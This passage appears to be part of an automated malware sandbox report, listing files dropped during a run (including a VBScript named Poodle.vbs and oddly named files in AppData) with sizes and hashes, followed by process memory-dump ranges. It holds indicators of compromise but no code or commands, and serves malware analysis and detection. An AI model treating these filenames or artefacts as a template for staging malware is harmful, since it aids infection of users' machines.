SHA256af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9
SHA512bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\09B406FB8A13DE24E07EA97DC21FE315Filesize
546B
MD556926ecc319a192bf7a1282c4dd0e228
SHA14292bc151c997c490b59cef5c27f44543433ed33
SHA2567420fc7fbd8a37c6ecc6a7a9a9d44c1e542f4444625ee675e7ed8531a080721b
SHA5123939cb3844512ddc0d4bc86e7874d9cc225fdc7ee974fa80db2081a71325d92d328d0328ac42ca6a1615b7ab1b4f25d982713ec4b20bc55006e1016bc9dac7a0
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751Filesize
192B
MD5e1b5e529c996404affbaf9182b1db3c1
SHA1d5021a6cf3d38001a3be99226940a30de0a08fd4
SHA2569b5be609f2b8803fe5e4f6c5ca06894ecc50970d815889f0086fd418e0b7bee2
SHA5126dbfd672f199cd3defda221d4e419f8ad01cec5c33224bcc96c18d27c1b7952984e8cd9c25f1decdfe5261949a90bd80ba0906100e9e4af6aee8769f4fd55e41
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheFilesize
53KB
MD5d4d8cef58818612769a698c291ca3b37
SHA154e0a6e0c08723157829cea009ec4fe30bea5c50
SHA25698fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0
SHA512f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD52247453c28acd1eb75cfe181540458a8
SHA1851fc5a9950d422d76163fdc6a453d6859d56660
SHA256358b8df2d92a70274c5ec8e50bf6353c37a7fe1855fd9659f610f8a96eac19bd
SHA51242475e640ee70ab4bd7350dbd970c5862f1597918b6a5e3ee038a10a5c5b883ac61038ecec51a7bfe7cb615798d832fae4a3ead9571f35825a644dee1f2dd7d3
-
C:\Users\Admin\AppData\Local\Temp\Poodle.vbsFilesize
187KB
MD58cc6be5a2911ea3dc1a05c80e20ede55
SHA15a68267614fc4f21b949dc82def16adb1a2a7178
SHA2567dfd8c4c8c675118ad9020c10d439d7037b6d9e8a37482f80ae821fed5b29824
SHA512cc57268ceca2b9911b1672d18692dca2bfcb65052c8b945614f766e66ed849bf8f14aa9076f7478026144f89995c1552ac596153bde157349bcca880094a264a
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5mulynwp.fg1.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\cuqlFilesize
4KB
MD5042bbbff30c31fcbdd7f9b0ed3935ca5
SHA1c333db2dceaf9a524147155c79756bc32eda6b03
SHA256626ae16f54b4ca656b0267dade381d30bf042a06ba69b8851e33ab14da2bd9fe
SHA5127f3a8eee89225ced48f8bc69d168713377e0316df3e46b544d9f7bc2c84305020eca3094c8246c8c934e22bd7643ae11f4a1560c3fe7aa717604869bcffa48fe
-
C:\Users\Admin\AppData\Roaming\Rytmen.FaeFilesize
534KB
MD5ce3d065bfc4261060ddfc8dca15898a4
SHA1b67f3aafe00ccb2ca051cdd2559ff918eb5e2d03
SHA256af008bfc605891eaaa3fef3579104b8eba30f9a19987b74c8a53287c90e6eb9e
SHA51203117174da97241f57f65cc6124e4e5baff6d72b64048fce560bedc7049dc39f3cb8d7501f7d526e89d2c95a090398478b043682955820be7a6460bafb32bd17
-
C:\Users\Admin\AppData\Roaming\belemnoidea.FosFilesize
519KB
MD59cc29e9c2f524984e4ea412888fad3ab
SHA1a3d9571861e7f334d70d82eb0c46e10f5427358e
SHA2566b8159ea57129f319affa7fa8ca8a74bb1e59894e7c269675df3f65b3c5e3887
SHA512d5761c80074c464327e346f2c89daed8de0691cc7d60140648f94c3d45232c035cebde895234118480abf6cdad4e187fcfb5fdd393aace83a52df62b4a493396
-
memory/1300-74-0x000000001F290000-0x000000001F2A9000-memory.dmpFilesize
100KB
-
memory/1300-52-0x0000000001DD0000-0x0000000003574000-memory.dmpFilesize
23.6MB
-
memory/1300-78-0x000000001F290000-0x000000001F2A9000-memory.dmpFilesize
100KB
-
memory/1300-77-0x000000001F290000-0x000000001F2A9000-memory.dmpFilesize
100KB
-
memory/1656-110-0x0000000009190000-0x000000000ECD5000-memory.dmpFilesize
91.3MB
-
memory/2228-15-0x00007FF8AF430000-0x00007FF8AFEF1000-memory.dmpFilesize
10.8MB
-
memory/2228-10-0x000002871FC50000-0x000002871FC72000-memory.dmpFilesize
136KB
-
memory/2228-16-0x00007FF8AF430000-0x00007FF8AFEF1000-memory.dmpFilesize
10.8MB
-
memory/2228-43-0x00007FF8AF433000-0x00007FF8AF435000-memory.dmpFilesize
8KB
-
memory/2228-45-0x00007FF8AF430000-0x00007FF8AFEF1000-memory.dmpFilesize
10.8MB
-
memory/2228-55-0x00007FF8AF430000-0x00007FF8AFEF1000-memory.dmpFilesize
10.8MB
-
memory/2228-4-0x00007FF8AF433000-0x00007FF8AF435000-memory.dmpFilesize
8KB
-
memory/2360-92-0x0000000005580000-0x00000000058D4000-memory.dmpFilesize
3.3MB
-
memory/2360-94-0x0000000005CF0000-0x0000000005D3C000-memory.dmpFilesize
304KB
-
memory/3172-35-0x0000000005CE0000-0x0000000005D2C000-memory.dmpFilesize
304KB
-
memory/3172-22-0x00000000055E0000-0x0000000005646000-memory.dmpFilesize
408KB
-
memory/3172-19-0x0000000002370000-0x00000000023A6000-memory.dmpFilesize
216KB
-
memory/3172-20-0x0000000004E40000-0x0000000005468000-memory.dmpFilesize
6.2MB
-
memory/3172-21-0x0000000004D00000-0x0000000004D22000-memory.dmpFilesize
136KB
-
memory/3172-23-0x00000000056C0000-0x0000000005726000-memory.dmpFilesize
408KB
-
memory/3172-33-0x0000000005730000-0x0000000005A84000-memory.dmpFilesize
3.3MB
-
memory/3172-34-0x0000000005CB0000-0x0000000005CCE000-memory.dmpFilesize
120KB
-
memory/3172-36-0x0000000007620000-0x0000000007C9A000-memory.dmpFilesize
6.5MB
-
memory/3172-37-0x0000000006200000-0x000000000621A000-memory.dmpFilesize
104KB
-
memory/3172-42-0x0000000008250000-0x00000000099F4000-memory.dmpFilesize
23.6MB
-
memory/3172-40-0x0000000007CA0000-0x0000000008244000-memory.dmpFilesize
5.6MB
-
memory/3172-39-0x0000000006EE0000-0x0000000006F02000-memory.dmpFilesize
136KB
-
memory/3172-38-0x0000000006FA0000-0x0000000007036000-memory.dmpFilesize
600KB
-
memory/3684-68-0x0000000000400000-0x0000000000424000-memory.dmpFilesize
144KB
-
memory/3684-64-0x0000000000400000-0x0000000000424000-memory.dmpFilesize
144KB
-
memory/3684-67-0x0000000000400000-0x0000000000424000-memory.dmpFilesize
144KB
-
memory/3880-117-0x0000000000E40000-0x0000000006985000-memory.dmpFilesize
91.3MB
-
memory/3880-127-0x0000000000E40000-0x0000000006985000-memory.dmpFilesize
91.3MB
-
memory/4500-60-0x0000000000400000-0x0000000000478000-memory.dmpFilesize
480KB
-
memory/4500-63-0x0000000000400000-0x0000000000478000-memory.dmpFilesize
480KB
-
memory/4500-66-0x0000000000400000-0x0000000000478000-memory.dmpFilesize
480KB
-
memory/4772-61-0x0000000000400000-0x0000000000462000-memory.dmpFilesize
392KB
-
memory/4772-62-0x0000000000400000-0x0000000000462000-memory.dmpFilesize
392KB
-
memory/4772-65-0x0000000000400000-0x0000000000462000-memory.dmpFilesize
392KB